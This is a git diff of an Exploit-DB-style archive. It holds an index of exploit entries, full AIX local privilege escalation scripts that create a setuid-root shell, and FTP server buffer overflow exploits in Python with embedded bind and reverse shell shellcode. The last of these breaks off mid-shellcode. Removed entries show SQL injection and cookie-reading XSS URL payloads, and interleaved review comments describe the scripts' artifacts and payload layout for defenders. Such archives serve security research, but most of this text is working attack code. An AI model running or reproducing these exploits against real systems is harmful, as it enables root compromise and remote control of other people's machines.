||||
|
@ -30946,7 +30941,7 @@ id,file,description,date,author,platform,type,port
|
|||
34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
|
||||
34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0
|
||||
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
|
||||
34250,platforms/php/webapps/34250.txt,"Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
|
||||
34250,platforms/php/webapps/34250.txt,"Joomla! Component 'com_canteen' 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
|
||||
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
|
||||
34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps,0
|
||||
34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0
|
||||
|
@ -31131,7 +31126,7 @@ id,file,description,date,author,platform,type,port
|
|||
34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
|
||||
34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0
|
||||
34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - scrivi.php URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0
|
||||
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection",2010-08-12,Affix,php,webapps,0
|
||||
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)",2010-08-12,Affix,php,webapps,0
|
||||
34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0
|
||||
34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0
|
||||
34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
|
||||
|
@ -33979,6 +33974,7 @@ id,file,description,date,author,platform,type,port
|
|||
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
|
||||
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
|
||||
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
|
||||
40709,platforms/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
|
||||
37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
|
||||
|
@ -36568,7 +36564,7 @@ id,file,description,date,author,platform,type,port
|
|||
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
|
||||
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
40439,platforms/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
|
||||
40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0
|
||||
40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
|
||||
|
@ -36588,7 +36584,7 @@ id,file,description,date,author,platform,type,port
|
|||
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
|
||||
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection (1)",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
|
||||
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
|
||||
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
|
||||
|
@ -36711,7 +36707,7 @@ id,file,description,date,author,platform,type,port
|
|||
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
|
||||
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
|
||||
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection (2)",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
|
||||
40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
|
||||
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
|
||||
|
@ -36797,3 +36793,9 @@ id,file,description,date,author,platform,type,port
|
|||
40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0
|
||||
40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
|
||||
40711,platforms/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
|
||||
40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0
|
||||
40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0
|
||||
40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
|
||||
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
|
||||
|
|
|
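--- a/platforms/aix/local/40709.sh
+++ b/platforms/aix/local/40709.sh
@@ -0,0 +1,62 @@
+#!/usr/bin/sh
+#
+# AIX lsmcode local root exploit.
+#
+# Affected: AIX 6.1/7.1/7.2.0.2
+#
+# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
+#
+# lqueryroot.sh by @hxmonsegur [2016 //RSL]
+
+ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
+
+if [ ! -x "/usr/sbin/lsmcode" ]; then
+echo "[-] lsmcode isn't executable. Exploit failed."
+exit 1
+fi
+
+echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
+echo "[*] Current id: `/usr/bin/id`"
+echo "[*] Exporting variables"
+
+MALLOCOPTIONS=buckets
+MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
+export MALLOCOPTIONS MALLOCBUCKETS
+
+echo "[*] Setting umask to 000"
+umask 000
+
+echo "[*] Executing vulnerable binary [lsmcode]"
+/usr/sbin/lsmcode -c >/dev/null 2>&1
+
+if [ ! -e "/etc/suid_profile" ]; then
+echo "[-] /etc/suid_profile does not exist and exploit failed."
+exit 1
+fi
+
+echo "[*] Cleaning up /etc/suid_profile"
+echo > /etc/suid_profile
+
+echo "[*] Preparing escalation"
+cat << EOF >/etc/suid_profile
+cp /bin/ksh $ROOTSHELL
+/usr/bin/syscall setreuid 0 0
+chown root:system $ROOTSHELL
+chmod 6755 $ROOTSHELL
+rm /etc/suid_profile
+EOF
+
+echo "[*] Cleaning up environment variables"
+unset MALLOCBUCKETS MALLOCOPTIONS
+
+echo "[*] Escalating"
+/usr/bin/ibstat -a >/dev/null 2>&1
+
+if [ ! -e "$ROOTSHELL" ]; then
+echo "[-] Rootshell does not exist and exploit failed."
+exit 1
+fi
+
+echo "[*] Executing rootshell"
+$ROOTSHELL
+echo "[*] Make sure to remove $ROOTSHELL"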
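Review bot: The header comment does not document the state this script leaves on the host, and its credit line names `lqueryroot.sh` although the file targets `/usr/sbin/lsmcode`, which looks like a carry-over from the lquerylv script. It also gives no advisory or CVE identifier, so the entry cannot be matched to a vendor fix from the file alone. The body sets `umask 000`, writes `/etc/suid_profile`, and creates a setuid-root copy of `/bin/ksh` at `/tmp/shell-<random>`; on the `exit 1` path taken when the shell copy was not created, `/etc/suid_profile` stays in place with the here-document contents. I would add a header line such as `# Artifacts: /etc/suid_profile, setuid-root /tmp/shell-* - verify both are removed after a lab run`. Both paths are also useful file-integrity and triage indicators on AIX hosts.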
131
platforms/aix/local/40710.sh
Executable file
|
@ -0,0 +1,131 @@
|
|||
#!/usr/bin/sh
|
||||
#
|
||||
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
|
||||
#
|
||||
# This exploit takes advantage of known issues with debugging functions
|
||||
# within the AIX linker library. We are taking advantage of known
|
||||
# functionality, and focusing on badly coded SUID binaries which do not
|
||||
# adhere to proper security checks prior to seteuid/open/writes.
|
||||
#
|
||||
# The CVEs we will be taking advantage of:
|
||||
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
|
||||
# local users to create or overwrite arbitrary files via a symlink attack on
|
||||
# the log file associated with the MALLOCDEBUG environment variable.
|
||||
#
|
||||
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
|
||||
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
|
||||
# environment variables, which allows local users to gain privileges by
|
||||
# leveraging a setuid-root program to create an arbitrary root-owned file
|
||||
# with world-writable permissions, related to libC.a (aka the XL C++ runtime
|
||||
# library) in AIX 5.3 and libc.a in AIX 6.1.
|
||||
#
|
||||
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
|
||||
# File Writes In IBM AIX.
|
||||
#
|
||||
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
|
||||
# which were reported in the original reports as being used for escalation of
|
||||
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
|
||||
# patches and become an attack vector.
|
||||
#
|
||||
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
|
||||
#
|
||||
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
|
||||
|
||||
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
|
||||
APP=$0
|
||||
|
||||
function usage
|
||||
{
|
||||
echo "Usage: $APP [1] | [2] | [3]"
|
||||
echo
|
||||
echo "1 - MALLOCDEBUG file write -> escalation"
|
||||
echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
|
||||
echo "3 - MALLOCBUCKETS file write -> escalation"
|
||||
echo
|
||||
echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
|
||||
exit
|
||||
}
|
||||
|
||||
function CVE20091786
|
||||
{
|
||||
echo "[*] Exporting MALLOCDEBUG environment variable"
|
||||
MALLOCTYPE=debug
|
||||
MALLOCDEBUG=report_allocations,output:/etc/suid_profile
|
||||
export MALLOCTYPE MALLOCDEBUG
|
||||
}
|
||||
|
||||
function CVE20092669
|
||||
{
|
||||
echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
|
||||
_LIB_INIT_DBG=1
|
||||
_LIB_INIT_DBG_FILE=/etc/suid_profile
|
||||
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
|
||||
}
|
||||
|
||||
function CVE20143074
|
||||
{
|
||||
echo "[*] Exporting MALLOCBUCKETS environment variable"
|
||||
MALLOCOPTIONS=buckets
|
||||
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
|
||||
export MALLOCOPTIONS MALLOCBUCKETS
|
||||
}
|
||||
|
||||
if [ -z "$1" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
|
||||
while [ "$1" != "" ]; do
|
||||
case $1 in
|
||||
1 ) CVE20091786;;
|
||||
2 ) CVE20092669;;
|
||||
3 ) CVE20143074;;
|
||||
* ) usage
|
||||
break;;
|
||||
esac
|
||||
shift
|
||||
done
|
||||
|
||||
if [ ! -x "/usr/sbin/lquerylv" ]; then
|
||||
echo "[-] lquerylv isn't executable. Tough luck."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Setting umask to 000"
|
||||
umask 000
|
||||
|
||||
echo "[*] Execute our vulnerable binary"
|
||||
/usr/sbin/lquerylv >/dev/null 2>&1
|
||||
|
||||
if [ ! -e "/etc/suid_profile" ]; then
|
||||
echo "[-] /etc/suid_profile does not exist and exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Cleaning up /etc/suid_profile"
|
||||
echo > /etc/suid_profile
|
||||
|
||||
echo "[*] Current id: `/usr/bin/id`"
|
||||
|
||||
echo "[*] Adding payload"
|
||||
cat << EOF >/etc/suid_profile
|
||||
cp /bin/ksh $ROOTSHELL
|
||||
/usr/bin/syscall setreuid 0 0
|
||||
chown root:system $ROOTSHELL
|
||||
chmod 6755 $ROOTSHELL
|
||||
rm /etc/suid_profile
|
||||
EOF
|
||||
|
||||
echo "[*] Unsetting env"
|
||||
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE
|
||||
|
||||
echo "[*] Executing ibstat for fun and profit"
|
||||
/usr/bin/ibstat -a >/dev/null 2>&1
|
||||
|
||||
if [ ! -e "$ROOTSHELL" ]; then
|
||||
echo "[-] Rootshell does not exist and exploit failed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "[*] Executing rootshell"
|
||||
$ROOTSHELL
|
|
@ -1,9 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/11337/info
|
||||
|
||||
It is reported that CubeCart is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI data prior to including it in an SQL query.
|
||||
|
||||
An attacker may exploit this issue to manipulate SQL queries, potentially revealing or corrupting sensitive database data. This issue may also facilitate attacks against the underlying database software.
|
||||
|
||||
This vulnerability is reported to exist in version 2.0.1 of CubeCart. Other versions may also be affected.
|
||||
|
||||
http://www.example.com/store/index.php?cat_id=1 or 1=1
|
|
@ -1,29 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40444/info
|
||||
|
||||
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The issue affects Joomla! versions prior to 1.5.18.
|
||||
|
||||
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40690/info
|
||||
|
||||
The JForJoomla JReservation component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40828/info
|
||||
|
||||
The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/index.php?r=[XSS]
|
|
@ -1,9 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/40860/info
|
||||
|
||||
The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/index.php?option=com_easygb&Itemid=[XSS]
|
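--- a/platforms/windows/remote/40711.py
+++ b/platforms/windows/remote/40711.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+#-*- coding: utf-8 -*-
+
+# Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
+# Date: 04/11/2016
+# Exploit Author: Luis Noriega
+# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
+# Version: 1.0
+# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
+# CVE : n/a
+
+
+import socket
+
+# shellcode with metasploit:
+# msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
+# nc 192.168.1.150 4444
+
+ret = "\x2F\x1D\xF1\x77" # GDI32.dll
+shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
+"\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a"
+"\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11"
+"\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac"
+"\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4"
+"\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07"
+"\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c"
+"\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53"
+"\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8"
+"\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48"
+"\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39"
+"\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e"
+"\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35"
+"\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77"
+"\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde"
+"\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51"
+"\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41"
+"\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52"
+"\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83"
+"\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2"
+"\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34"
+"\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0"
+"\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4"
+"\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe")
+
+
+buffer = '\x90' * 30 + shellcode
+buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer))
+print "Sending Buffer"
+
+s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
+connect = s.connect(('192.168.1.150', 21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('SITE ZONE' + buffer1 + '\r\n')
+s.close()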
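Review bot: The `buffer1` assignment carries no comment explaining its layout, so a reader has to add up the literals to see that the `SITE ZONE` argument is always 995 bytes (242 filler bytes, the 4-byte `ret`, then the NOP-prefixed payload padded out to 749). A single FTP command line of that size is the observable a defender can key on, and it is worth stating next to the code: `# argument = 242 filler + 4-byte ret + payload padded to 749 -> 995 bytes on one command line`. The `ret` value is labelled only `# GDI32.dll`; it presumably matches the Windows XP SP3 build named in the header, and the comment should say so. The same missing layout comment applies to `buffer1` in 40712.py and `buffer2` in 40713.py.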
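--- a/platforms/windows/remote/40712.py
+++ b/platforms/windows/remote/40712.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+import socket
+
+
+#Exploit Title: PCMan FTP Server 2.0 Buffer Overflow NLST command
+#Date: 03/11/16
+#Exploit Author: Karri93
+#Version: 2.0
+#Tested on: Windows XP Profesional SP3 Spanish x86
+#CVE: N/A
+
+
+#Shellcode Metasploit:
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
+#nc -lvp 443
+
+
+ret= "\x2F\x1D\xF1\x77" #GDI32.dll
+
+shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
+"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
+"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
+"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
+"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
+"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
+"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
+"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
+"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
+"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
+"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
+"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
+"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
+"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
+"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
+"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
+"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
+"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
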